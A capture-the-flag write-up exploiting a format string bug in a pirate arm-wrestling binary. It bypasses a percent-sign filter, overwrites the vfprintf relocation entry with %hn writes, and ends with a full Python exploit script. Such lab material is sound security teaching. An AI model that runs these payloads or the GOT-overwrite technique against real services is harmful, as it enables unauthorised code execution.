I am not going to explain how format strings work since the topic is documented everywhere; I highly recommend reading Alex Reece's blog post on it before moving forward.
Introducing the game
When running booty for the first time you are prompted to enter a pirate name for what looks like an arm wrestling game:
.-= Pirate Arm Wrestling =-.
Who will become the next PIRATE KING?
If ye want the power and glory for yourself then show your worth!
Face the other challengers in a mighty arm wrestle and prove your right to rule.
What be ye fearsome pirate name?
>
After entering the pirate name, you are shown one of three possible fight statuses:
a) Beer Wench is looking exhausted!
b) Beer Wench starts to tense up.
c) Beer Wench begins to flex their muscles.
Where "Beer Wench" is the name of the opponent.
Every time a fight status is displayed you need to select an action to take:
Choose an action, [p]ush [h]old [r]est:
>
If the right actions are selected (push when the opponent is exhausted, rest when they tense up, and hold when they flex their muscles), the pirate eventually wins the game and the message below is displayed:
The game then asks the player to change the pirate name and start again. It also prints a stack address that can help defeat ASLR if needed:
0xbfaea85f marks the spot of your treasure!
The vulnerability
The format string vulnerability is in the vfprintf call that prints the pirate name: no format (e.g. %s) is passed as a parameter, so the name itself is used as the format string and can be manipulated by the user:
However, if we try to enter a pirate name containing the % character, it will be removed by the function below:
But there are two bugs in the function above:
a) Only the first percent sign is removed from the string entered, so the pirate name %AAAA%p is changed to \0AAAA%p (the % is replaced with a null byte). Because of the null char at the beginning, we cannot trigger the vulnerability yet. Here the second bug comes to the rescue.
b) Once we win the game, we have the chance to change the pirate name. However, the buffer is not cleared before the next pirate name is copied in with memcpy, so if we enter a single "B" the new name ends up being BAAAA%p.
Let's test the assumption explained above by entering %AAAA%p as the first pirate name and B as the second. We get the result below:
This confirms our assumption. At the bottom we can also see a leaked address, 0x8048f40, where the pirate name is printed, which confirms that the format string has been processed.
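The two bugs can be modelled in a few lines of Python. This is only a hypothetical sketch that matches the behaviour described above, not the binary's real code; the names set_name and name_buf are made up for illustration, and the 32-byte buffer size is an assumption.

```python
def set_name(buf, user_input):
    """Hypothetical model of booty's name handling, based on the observed behaviour."""
    filtered = bytearray(user_input)
    pos = filtered.find(b"%")
    if pos != -1:
        filtered[pos] = 0               # bug a): only the first '%' is replaced
    buf[:len(filtered)] = filtered      # bug b): bytes past the new input are kept
    # printf-style functions stop reading at the first null byte
    return bytes(buf).split(b"\x00", 1)[0]


name_buf = bytearray(32)                # zero-filled stand-in for the name buffer
first = set_name(name_buf, b"%AAAA%p")  # starts with a null byte, so it prints as empty
second = set_name(name_buf, b"B")       # the stale tail of the first name survives
print(first, second)                    # b'' b'BAAAA%p'
```

The second call shows why a one-byte name is enough: it only replaces the null byte, and the rest of the first name, including its second %, is still in the buffer.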
Redirecting execution flow
From here on everything is fun. We have multiple options to gain code execution; one way to exploit a format string is to overwrite a key pointer to redirect the execution flow. For this, we need to gather some requirements:
a) Decide which pointer to overwrite: a good candidate can always be taken from the relocation table, where:
"relocations are entries in binaries that are left to be filled in later -- at link time by the toolchain linker or at runtime by the dynamic linker. A relocation in a binary is a descriptor which essentially says "determine the value of X, and put that value into the binary at offset Y""
Although with ASLR enabled the addresses of the library functions change on every run, the offsets in the relocation table stay the same, which keeps our exploit reliable. To confirm this, let's list the relocations from booty:
#readelf -r booty
Relocation section '.rel.dyn' at offset 0x3d8 contains 3 entries:
Offset Info Type Sym.Value Sym. Name
0804a0f4 00000706 R_386_GLOB_DAT 00000000 __gmon_start__
0804a1a0 00001105 R_386_COPY 0804a1a0 stdin
0804a1a4 00000f05 R_386_COPY 0804a1a4 stdout
Relocation section '.rel.plt' at offset 0x3f0 contains 14 entries:
Offset Info Type Sym.Value Sym. Name
0804a104 00000107 R_386_JUMP_SLOT 00000000 fflush
0804a108 00000207 R_386_JUMP_SLOT 00000000 memcpy
0804a10c 00000307 R_386_JUMP_SLOT 00000000 fclose
0804a110 00000407 R_386_JUMP_SLOT 00000000 time
0804a114 00000507 R_386_JUMP_SLOT 00000000 _IO_getc
0804a118 00000607 R_386_JUMP_SLOT 00000000 _IO_putc
0804a11c 00000707 R_386_JUMP_SLOT 00000000 __gmon_start__
0804a120 00000807 R_386_JUMP_SLOT 00000000 exit
0804a124 00000907 R_386_JUMP_SLOT 00000000 srand
0804a128 00000a07 R_386_JUMP_SLOT 00000000 __libc_start_main
0804a12c 00000b07 R_386_JUMP_SLOT 00000000 fopen
0804a130 00000c07 R_386_JUMP_SLOT 00000000 strncpy
0804a134 00000d07 R_386_JUMP_SLOT 00000000 rand
0804a138 00000e07 R_386_JUMP_SLOT 00000000 vfprintf
The offsets are listed in the first column. Let's focus on the last row, for the vfprintf function: at offset 0x0804a138 there will be a pointer to vfprintf, which is resolved at link time or run time. Below we can see that after running booty twice the offset contains two different pointers:
gdb$ x/x 0x0804a138
0x804a138: 0xb7614c10
gdb$ x/x 0x804a138
0x804a138: 0xb75c2c10
What we are going to do is change the pointer at offset 0x0804a138 so that as soon as vfprintf is called, execution jumps to our desired address!!!
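b) Decide the destination address: we will redirect the flow to 0x080487C0, the code in booty that prints the flag.
c) We have the relocation offset to manipulate and the destination address to redirect the flow to, but how do we actually achieve this? I highly encourage you to read this excellent blog for detailed steps.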
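The lookup from step a) can also be scripted. The sketch below parses a few lines copied from the readelf output above and returns the offset of a given symbol's jump slot. The helper name find_jump_slot is made up for illustration, and the parser assumes exactly the five-column layout shown in this post; other readelf versions may print the symbol name differently.

```python
# Three rows copied from the '.rel.plt' listing above.
READELF_LINES = """\
0804a130 00000c07 R_386_JUMP_SLOT 00000000 strncpy
0804a134 00000d07 R_386_JUMP_SLOT 00000000 rand
0804a138 00000e07 R_386_JUMP_SLOT 00000000 vfprintf
"""


def find_jump_slot(readelf_text, symbol):
    """Return the relocation offset of `symbol`, or None if it is not listed."""
    for line in readelf_text.splitlines():
        fields = line.split()
        # Expected columns: Offset, Info, Type, Sym.Value, Sym. Name
        if len(fields) == 5 and fields[2] == "R_386_JUMP_SLOT" and fields[4] == symbol:
            return int(fields[0], 16)
    return None


slot = find_jump_slot(READELF_LINES, "vfprintf")
print(hex(slot))  # 0x804a138
```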
Overwritten relocation offset
First we need to place the address to be overwritten on the stack and work out its argument number so that we can reference it via %
As explained in The vulnerability section, in order to bypass the filter, we need to enter the first name as:
"%\xa1\x04\x08\x38\xa1\x04\x08"
Since the first % will be changed to a null byte, once we win the game and are prompted to change the name we enter the single byte 0x3a, which gives us the final name:
"\x3a\xa1\x04\x08\x38\xa1\x04\x08"
We are sending (in little-endian format) two addresses to be overwritten later: 0x0804a13a, which holds the higher two bytes of the pointer, followed by 0x0804a138, which holds the lower two bytes.
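As a quick check of the byte order, the same eight bytes can be produced with Python's struct module. This is a minimal sketch; the names GOT_VFPRINTF and name_prefix are introduced here for illustration only.

```python
import struct

GOT_VFPRINTF = 0x0804A138  # relocation offset of vfprintf from the readelf output


def name_prefix(slot):
    """Pack the addresses of the upper and lower halves of a 32-bit slot."""
    hi_addr = slot + 2     # little-endian: the upper two bytes live at slot + 2
    lo_addr = slot
    return struct.pack("<II", hi_addr, lo_addr)


prefix = name_prefix(GOT_VFPRINTF)
first_name = b"%" + prefix[1:]   # first byte swapped for % to get past the filter
second_name = prefix[:1]         # sent after winning, restores the first byte
print(prefix == b"\x3a\xa1\x04\x08\x38\xa1\x04\x08")  # True
```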
In order to test it, you can run booty via socat as usual:
# socat tcp-listen:4444,fork exec:./booty
Then execute the exploit, which must include a raw_input() call to give us a chance to attach gdb (full exploit at the end): #./exploit_booty.py
And finally in another window we run:
# ps -fea |grep booty
root 5021 2335 0 Dec08 pts/1 00:00:00 socat tcp-listen:4444,fork exec:./booty
root 6022 3313 0 Dec08 pts/3 00:00:01 vi exploit_booty.py
root 6942 3251 0 04:46 pts/2 00:00:00 /usr/bin/python ./exploit_booty.py
root 6943 5021 0 04:46 pts/1 00:00:00 socat tcp-listen:4444,fork exec:./booty
root 6944 6943 0 04:46 pts/1 00:00:00 ./booty
# gdb attach 6944
Before letting gdb continue, let's set a breakpoint right before the format string vulnerability is triggered:
gdb$ br *0x08048a30
Breakpoint 1 at 0x8048a30
We let it run two times so that the two names can be entered:
gdb$ continue
gdb$ continue
Once the breakpoint is hit we print the stack content:
=> 0x8048a30: call 0x8048770
0x8048a35: mov DWORD PTR [esp],0x80499e3
0x8048a3c: call 0x8048770
0x8048a41: pop ecx
0x8048a42: pop esi
0x8048a43: lea esi,[esp+0x17]
0x8048a47: push esi
0x8048a48: push 0x804957c
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048a30 in ?? ()
gdb$ x/64x $esp
0xbfa1ed30: 0xbfa1eda8 0x08048f40 0xbfa1ee58 0x08048796
0xbfa1ed40: 0xb76e24e0 0x080496e8 0xbfa1ed64 0x00a1eda0
0xbfa1ed50: 0xbfa1eda0 0x00000001 0xbfa1ede8 0x08048e51
0xbfa1ed60: 0xbfa1eda0 0x00000001 0xbfa1ee58 0x08048796
0xbfa1ed70: 0xb76e24e0 0x080499de 0xbfa1ed94 0x70a1ed88
0xbfa1ed80: 0xb75bce84 0xbfa1eda0 0x55555556 0x08048679
0xbfa1ed90: 0xbfa1eda0 0xbfa1ede8 0x08049ad0 0x00000000
0xbfa1eda0: 0x00000033 0x00000000 0x0804a13a 0x0804a138
If you do the math and count all the dwords on the stack, skipping the first one (0xbfa1eda8, the pointer to the name string itself, which is used as the format), you will see that the two addresses we entered are the 30th argument (0x0804a13a) and the 31st argument (0x0804a138). As a sanity check, the 1st argument is 0x08048f40, the same value leaked by %p earlier.
The next step is to confirm that we can change its content. If you remember, at point b) above we planned to fill this offset with the address 0x080487C0. Since we are going to overwrite only two bytes at a time, we split the target address into:
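The counting can be done with simple arithmetic on the addresses from the gdb dump: the dword at $esp has index 0 and is not counted as an argument, and every following dword is one argument further. A small sketch, where arg_index is a hypothetical helper name:

```python
STACK_TOP = 0xBFA1ED30  # $esp at the breakpoint, from the dump above


def arg_index(stack_top, addr, word=4):
    """Index of the dword at `addr`, counting the dword at $esp as 0."""
    return (addr - stack_top) // word


print(arg_index(STACK_TOP, 0xBFA1EDA8))  # 30 -> holds 0x0804a13a
print(arg_index(STACK_TOP, 0xBFA1EDAC))  # 31 -> holds 0x0804a138
```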
0804 = 2052 decimal
87C0 -> 0x87C0 -2052 = 32700 decimal
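The same arithmetic in Python, as a minimal sketch (split_writes is a name made up for this example). The modulo is an addition of mine: it covers targets whose lower half is smaller than the upper half, where the 16-bit counter has to wrap around.

```python
TARGET = 0x080487C0  # destination address used in this post


def split_writes(target):
    """Return (count for the upper half, extra count needed for the lower half)."""
    high = target >> 16      # 0x0804
    low = target & 0xFFFF    # 0x87C0
    # %hn stores only the low 16 bits of the running count, so work modulo 0x10000
    extra = (low - high) % 0x10000
    return high, extra


print(split_writes(TARGET))  # (2052, 32700)
```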
This is where the %n specifier comes into play. Its man page definition is:
The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.
Let's see a practical example of %n:
#include <stdio.h>
int main()
{
int val;
printf("count this %n this does not count\n", &val);
printf("val = %d\n", val);
return 0;
}
# ./n
count this this does not count
val = 11
What we just learned is that the %n specifier stores, at the provided address, the number of characters written so far; that is why the string "this does not count" was not added to the final count. We can also choose which argument %n uses as the address to store the count by using the dollar sign, e.g. %30$n for the 30th argument. Last but not least, the h modifier (%hn) tells %n to write only two bytes (a short) instead of four.
With all these features learned, we can come up with a request to overwrite the higher two bytes of the pointer, at address 0x0804a13a, with 0x0804, assuming the target address is located at the 30th argument:
"\x3a\xa1\x04\x08" + "%2048x%30$hn"
Where:
\x3a\xa1\x04\x08 = the address of the higher two bytes of the target pointer (0x0804a13a)
%2048x = as mentioned above, we are trying to write 0x0804 = 2052, so 2048 plus the 4 bytes of the address give the count that %n will store
%30$hn = we tell the n specifier to use the 30th argument (which holds the target address on the stack) and to write only two bytes
Let's test what we just learned by sending to booty the pirate name:
"%\xa1\x04\x08" + "%2048x%30$hn"
And "\x3a" as the new name once we win the game.
Again we set a breakpoint at 0x08048a30; once it is hit, we step into the function that triggers the vulnerability. Before executing the vfprintf call we print the current value of the higher two bytes of the target pointer:
Before:
=> 0x8048785: call 0x8048570
0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x0000b75d
gdb$
Then we proceed to execute the vfprintf and print the content after:
=> 0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
0x80487a3: push 0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x00000804
gdb$
Voila!!! We can see that we have successfully changed the higher two bytes of the target pointer. The final step is to do the math for the remaining lower two bytes, located at 0x0804a138, which is the 31st argument as we learned before. The final pirate name string will be:
"%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"
There are two important changes with respect to the previous request. First, we now send both addresses (for the higher and the lower two bytes), so 8 bytes precede the first $hn, which lowers the padding from 2048 to 2044 to keep the count at 2052. Second, the second padding is 32700. Why? Remember that the bytes to write are 0x87C0.
Doing the math, 2052 bytes have already been written before the second $hn, so 0x87C0 - 2052 gives the remaining padding of 32700.
Finally, by running the final exploit we can see that right after triggering the format string we have successfully overwritten the original pointer to vfprintf with 0x080487C0, which is where the flag is printed out:
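The padding math can be wrapped in a small generator plus a checker that replays the running character count. This is a sketch under stated assumptions, not part of the original exploit: build_format and simulate are hypothetical names, the checker only understands the %<width>x%<arg>$hn pattern used in this post, and it assumes each %<width>x prints exactly <width> characters (true for 32-bit values once the width is at least 8).

```python
import re


def build_format(prefix_len, writes):
    """writes: list of (argument number, 16-bit value) in the order they are emitted."""
    parts = []
    count = prefix_len                   # bytes already printed (the packed addresses)
    for arg, value in writes:
        pad = (value - count) % 0x10000  # %hn keeps only the low 16 bits of the count
        if pad < 8:
            pad += 0x10000               # keep the width >= 8 so %x prints exactly `pad` chars
        parts.append("%{}x%{}$hn".format(pad, arg))
        count += pad
    return "".join(parts)


def simulate(prefix_len, fmt):
    """Replay the character counter and return {argument number: value stored by %hn}."""
    count = prefix_len
    stored = {}
    for width, arg in re.findall(r"%(\d+)x%(\d+)\$hn", fmt):
        count += int(width)
        stored[int(arg)] = count & 0xFFFF
    return stored


fmt = build_format(8, [(30, 0x0804), (31, 0x87C0)])
print(fmt)               # %2044x%30$hn%32700x%31$hn
print(simulate(8, fmt))  # {30: 2052, 31: 34752}
```

Calling build_format(4, [(30, 0x0804)]) reproduces the single-write test string from earlier, %2048x%30$hn.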
gdb$ x/x 0x0804a138
0x804a138: 0xb75ddc10 Before triggering the vulnerability
gdb$ ni
--------------------------------------------------------------------------[code]
=> 0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
0x80487a3: push 0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a138
0x804a138: 0x080487c0 Relocation offset overwritten
gdb$
So, if we keep stepping into the code as soon as a vfprintf call is made it will jump to our desired place:
--------------------------------------------------------------------------[code]
=> 0x8048785: call 0x8048570 <vfprintf@plt> Redirecting the flow here!!!
0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x8048570
0x8048576
0x804857b
0x8048580: lea ecx,[esp+0x4]
0x8048584: and esp,0xfffffff0
0x8048587: xor eax,eax
0x8048589: push DWORD PTR [ecx-0x4]
0x804858c: push ebp
--------------------------------------------------------------------------------
0x08048570 in vfprintf@plt ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x80487c0: push ebx
0x80487c1: sub esp,0x10
0x80487c4: push 0x8049a60
0x80487c9: push 0x8049861
0x80487ce: call 0x8048540
0x80487d3: add esp,0x10
0x80487d6: test eax,eax
0x80487d8: mov ebx,eax
--------------------------------------------------------------------------------
0x080487c0 in ?? ()
gdb$
Exploit source code:
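#!/usr/bin/python
# Author: Danux Mitnick
# Date: Dec 5 2014
# Python 2 script (uses raw_input() and the print statement).
from socket import *
from time import sleep

s = socket(AF_INET, SOCK_STREAM)
s.connect(('localhost', 4444))

# Attach gdb here.
raw_input()
print s.recv(1024)
sleep(0.01)

# First name: the two addresses of the vfprintf slot plus the format string.
# The filter replaces the leading % with a null byte; it is restored later with \x3a.
cmd = "%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"  # Overwriting vfprintf
s.send(cmd + "\n")

while 1:
    sleep(0.01)
    data = s.recv(1024)
    if not data:
        # Server closed the connection.
        break
    print data
    # Pick the reply that matches the fight status or prompt just received.
    if "LEVEL" in data:
        cmd = "h\n"
    if "exhausted" in data:
        cmd = "p\n"
    if "flex" in data:
        cmd = "h\n"
    if "tense" in data:
        cmd = "r\n"
    if "again" in data:
        cmd = "y\n"
    if "name" in data:
        # Second name: one byte that overwrites the null left by the filter.
        cmd = "\x3a\n"
    if ">" in data:
        if cmd:
            s.send(cmd)
        cmd = ""
s.close()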